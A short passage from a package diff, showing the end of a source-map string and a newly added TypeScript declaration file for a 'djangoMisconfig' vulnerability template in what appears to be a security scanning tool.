E;QACd,sEAAsE;QACtE,8BAA8B;QAC9B,sDAAsD;KACvD;IACD,aAAa,EAAE,CAAC,QAAQ,EAAE,MAAM,CAAC;CAClC,CAAC"}

package/dist/hunt/templates/django-misconfig.d.ts ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ import type { VulnerabilityTemplate } from '../../types.js';
2	+ export declare const djangoMisconfig: VulnerabilityTemplate;